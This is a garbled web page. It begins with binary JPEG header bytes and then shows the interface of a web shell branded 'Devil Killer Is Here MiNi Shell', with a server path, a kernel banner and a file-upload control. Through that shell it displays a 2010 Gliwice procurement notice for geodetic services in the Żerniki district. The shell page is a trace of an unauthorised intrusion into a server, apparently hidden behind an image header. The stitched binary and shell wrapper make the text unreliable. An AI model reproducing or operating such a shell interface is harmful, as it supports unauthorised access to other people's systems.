JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20100524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20100524/131781-N-2010.html

<p class="kh_header"><b>Gliwice: Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania  Modernizacja gospodarki ściekowej miasta</b><br>
<b>Numer ogłoszenia: 131781 - 2010; data zamieszczenia: 24.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gliwice, Wydział Inwestycji i Remontów , ul. Zwycięstwa 21, 44-100 Gliwice, woj. śląskie, tel. +48 032 2385442, faks +48 032 2314058.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania  Modernizacja gospodarki ściekowej miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie ogółu działań/czynności geodezyjnych mających na celu realizację założeń wyjściowych dla regulacji terenowo-prawnych (prowadzonych na wniosek PWiK Gliwice, przez wydziały IR i GN - UM Gliwice) obszaru, na którym zrealizowano roboty zadania inwestycyjnego pn. Modernizacja gospodarki ściekowej dz. Żerniki w Gliwicach, w oparciu o wstępne, niezbędne uzgodnienia z właścicielami terenu i dokumentację projektową z 2001r. pn. Budowa kanalizacji sanitarnej i deszczowej wraz z remontem i modernizacją ulic dzielnicy Żerniki w Gliwicach, autorstwa BPBK w Katowicach.
Podziałów geodezyjnych należy dokonać z urzędu, w oparciu o art. 97, ust.3, pkt 1 ustawy o gospodarce nieruchomościami z 1997r.

Zamawiający dokonał podziału przedmiotu zamówienia na odrębne niżej wymienione części.

Część I:
Rejon ulicy Bernardyńskiej,

Część II:
Rejon ulicy Dybowskiego, 

Część III:
Rejon ulicy Szymanowskiego,

Część IV:
Rejon ulicy Omańkowskiej,

Część V:
Rejon ulicy Kadłubka.

Uwagi:

Wykonawcy usługi udostępnione będą:
- ustalenia z właścicielami działek podlegających podziałowi, w tym z gminą Gliwice jako właścicielem (dotyczy rejonu ulicy Omańkowskiej)
- materiały określające (wyjściowe) zamierzenia regulacji terenowo prawnej (opisowo i graficznie)
W oferowanej kwocie ryczałtowej należy ująć wszelkie koszty towarzyszące realizacji zamówienia, w tym m.in. koszt zamawianych map, odpisów KW, koniecznych uzgodnień, opłat urzędowych itp.
Dla terenów objętych poszczególnymi częściami obowiązują miejscowe plany zagospodarowania przestrzennego (PZP):
- dla części III, IV, V - PZP dla dz. Żerniki- Wschód zatwierdzony Uchwałą RM nr XXI/576/2004 z 8 lipca 2004r.
- dla II części - PZP dla dz. Żerniki- Zachód zatwierdzony Uchwałą RM nr XXV/658/2004r. z 2 grudnia 2004r.
- dla I części - brak aktualnego PZP( jest pisemne stanowisko Wydziału Planowania Przestrzennego /PP/ - UM Gliwice, o niewnoszeniu uwag do propozycji podziału przedstawionego niniejszym SIWZ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.35.50.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie moga ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, w szczególności 
Doświadczenie zawodowe: 
Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej: 
- dwie usługi odpowiadające swoim rodzajem usługom geodezyjnym stanowiących przedmiot niniejszego zamówienia tj. wykonał co najmniej 2 podziały geodezyjne o wartości nie mniejszej niż 10.000,00 zł (brutto) każdy.
w przypadku podmiotów działających wspólnie doświadczenie podlega sumowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, w szczególności 
Potencjał kadrowy: 
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel: 
- co najmniej 1 osobę z uprawnieniami zawodowymi do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii zgodnie z ustawą Prawo geodezyjne i kartograficzne z dnia 17 maja 1989r. (tekst jednolity Dz.U.nr 240 z 2005r. poz.2027 z późn.zm.).
W przypadku podmiotów działających wspólnie osoby zdolne do wykonania zamówienia podlegają sumowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na prawidłowe wykonanie zamówienia.
Ocena spełnienia ww. warunków dokonana zostanie w oparciu o informacje zawarte w nw. dokumentach i oświadczeniach na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.Wykonawca powołujący się przy wykazaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty określone w pkt.III.4.2 dotyczące tego podmiotu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki dokonywania zmian umowy: a/ konieczność przedłużenia (zmiany) terminu umownego oraz harmonogramu terminowo-rzeczowo-finansowego z powodu: 
- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności, 
- wyjątkowo niesprzyjających warunków fizycznych; bądź atmosferycznych, 
- przedłużających się terminów uzyskania uzgodnień organów administracji, 
- wystąpienia zamówień dodatkowych niezbędnych do prawidłowego wykonania realizowanego zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, 

b/ rezygnacji z wykonania części usługi - ograniczenie zakresu usługi wynikające z wprowadzenia zmian istotnych lub nieistotnych w przedmiocie zamówienia, które wynikły w trakcie wykonywania usługi, 

c/ zmiany przedstawicieli uczestników wykonywanej usługi w przypadku: 
- zmiany przedstawicieli Wykonawcy w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy, 
- zmiany przedstawicieli Zamawiającego na wniosek Zamawiającego, 

W projekcie umowy załączanym do przetargu do przypadków dla których zamawiający dopuszcza w możliwość aneksowania umowy, uwzględnić: 
- z przyczyn obiektywnych, niezależnych od usługodawcy (w tym np.: zmiana woli właściciela działki, oczekiwanie na decyzję organu) -zmiana terminu realizacji, zmiana zakresu rzeczowego 
- w przypadku rozbieżności stanu powykonawczego robót w odniesieniu do dokumentacji projektowej pn.Budowa kanalizacji sanitarnej i deszczowej wraz z remontem i modernizacją ulic dzielnicy Żerniki w Gliwicac- autorstwa BPBK w Katowicach lub w odniesieniu do zakresu wniosku PWiK (na podstawie których określono konieczny zakres regulacji terenowo-prawnej.
Uzgodnienia w tym zakresie wymagają dla swej ważności zatwierdzenia przez Prezydenta Miasta Gliwice lub upoważnioną przez niego osobę, a zmiana umowy może nastąpić jedynie na piśmie w formie aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.gliwice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Gliwicach Biuro Obsługi Interesantów stanowisko ds. zamówień publicznych 44-100 Gliwice ul. Zwycięstwa 21..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 10:00, miejsce: Urząd Miejski w Gliwicach Biuro Obsługi Interesantów stanowisko ds. zamówień publicznych 44-100 Gliwice ul. Zwycięstwa 21..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania Modernizacja gospodarki ściekowej miasta- Rejon ul. Bernardyńskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uporządkowanie sytuacji 5 działek (własności osób fizycznych ) o numerach 1009, 1010, 1011, 1013 i 1012 obrębu Szobiszowice, następująco:
- geodezyjne wydzielenie pasa terenu szerokości ok.3,5 m wzdłuż płn.-wsch. granicy działek nr 1009, 1010, 1011, 1013, tj. w pasie gdzie ułożono przewody kanalizacji sanitarnej ks250 i deszczowej kd400, z przypisaniem tak wydzielonemu terenowi służebności przejazdu dla działek o nr 1010, 1011, 1013.
Wymiar szerokości jw. określono orientacyjnie, ze względu na konieczność równoczesnego spełnienia warunku, żeby odległość ścian skrajnych elementów kanalizacji od granicy działki, nie była mniejsza od 0,5 m.
- równoczesne scalenie działki 1012 z działką 1013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania Modernizacja gospodarki ściekowej miasta- Rejon ulicy Dybowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uporządkowanie sytuacji 13 działek (własności osób fizycznych) o numerach: 513, 514, 516, 517, 518, 520, 521, 522, 523, 524, 526, 527, 528 obrębu Żerniki, następująco:
- poszerzenie pasa drogowego ulicy Dybowskiego - od strony płn.- zach. dz. nr 1659, kosztem ułamkowych części działek o numerach: 513, 514, 516, 517, 518, 520, 521, 522, 523, 524, 526, 527, 528 w obrębie Żerniki, położonych po parzystej stronie ulicy, wzdłuż linii podziału w linii istniejących ogrodzeń posesji, a w przypadku ich braku po linii prostej wyznaczonej przez punkty skrajne ogrodzenia najbliższej działki (oraz po ostatecznym uzgodnieniu z właścicielem dzielonej działki).
- scalenie ww. działek i nadanie rodzaju droga..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania Modernizacja gospodarki ściekowej miasta- Rejon ulicy Szymanowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uporządkowanie sytuacji 2 działek (własności osób fizycznych) sąsiadujących z sobą, o numerach 1173 i 1174 obrębu Żerniki, następująco:
- poszerzenie pasa drogowego ulicy Szymanowskiego od strony zachodniej kosztem ułamkowych części działek o numerach: 1173 i 1174 w obrębie Żerniki, położonych po parzystej stronie ulicy, wzdłuż linii podziału położonej w odległości 0,5 m od skrajni krawężnika jezdni
- scalenie ww. działek i nadanie rodzaju droga.
(możliwość włączenia do pasa drogowego drogi publicznej/powiatowej - ulicy Szymanowskiego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania Modernizacja gospodarki ściekowej miasta- Rejon ulicy Omańkowskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uporządkowanie sytuacji działek sąsiadujących z ulicą Omańkowskiej, poprzez wydzielenie z nich ułamkowych części przyległych do granicy działki geodezyjnej ulicy, na których wykonano przewody sieci kanalizacji sanitarnej i deszczowej oraz utwardzoną nawierzchnię drogową, w linii podziału położonej:
- 2,0 m licząc od krawężnika jezdni, na działkach osób fizycznych
- w granicach pasa drogowego ulicy Omańkowskiej według aktualnego miejscowego planu zagospodarowania przestrzennego (PZP), na działkach gminy Gliwice.

Wyżej opisane poszerzenie pasa drogowego ulicy Omańkowskiej dotyczy:
- ułamkowych części działek geodezyjnych w obrębie Żerniki, położonych po  parzystej stronie ulicy tj. od strony południowej i południowo wschodniej, o numerach (w nawiasach podano wcześniejszą numerację i właściciela: F-osoba fizyczna, G-G- gmina Gliwice): 1210/1 (280/1(F))/ul. Zgrzebnioka, 1255 (16(F)), 1256 (17(G-G)), 1258 (19(G-G)), 1291 (24(F)), 1293 (25(G-G)), 1294 (26(G-G))
- ułamkowych części działek geodezyjnych w obrębie Żerniki, położonych po  nieparzystej stronie ulicy tj. od strony północnej i płn.-zachodniej, o numerach (w nawiasach podano wcześniejszą numerację i właściciela: F-osoba fizyczna,
G-G- gmina Gliwice):
1099 ( 1/2 (F)), 1093 (6/1(F)), 1082 (7(F)), 1080 (13(F)), 1074 (14(F)), 1072 (16(F)), 1681 (59(G-G))/ul.Paska, 1062 (29/1(F)), 1063 (29/2(F)), 1061 (30F(X)),

Wydzielone działki należy scalić w większe jeśli sąsiadują ze sobą i nadać im rodzaj droga(możliwość docelowego włączenia do pasa drogowego drogi gminnej ulicy Omańkowskiej).

Łącznie podziałowi podlega 17 działek obrębu Żerniki, w tym: 12 działek własności osób fizycznych i 5 działek własności gminy Gliwice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania Modernizacja gospodarki ściekowej miasta- Rejon ulicy Kadłubka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uporządkowanie sytuacji 7 działek o numerach 921, 922, 924, 925, 926, 927, 928 obrębu Żerniki (w tym: 4 działki własności osób fizycznych, a 3 działki o numerach 922, 926, 928 - własność gminy w użytkowaniu wieczystym osób fizycznych), następująco:
- poszerzenie pasa drogowego ulicy Kadłubka od strony wschodniej dz. nr 1677, kosztem ułamkowych części działek o numerach: 921, 922, 924, 925, 926, 927, 928, położonych po parzystej stronie ulic, wzdłuż linii podziału wyznaczonej krawędzią jezdni.
- scalenie ww. działek i nadanie rodzaju droga..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.35.50.00-1.</p></li>
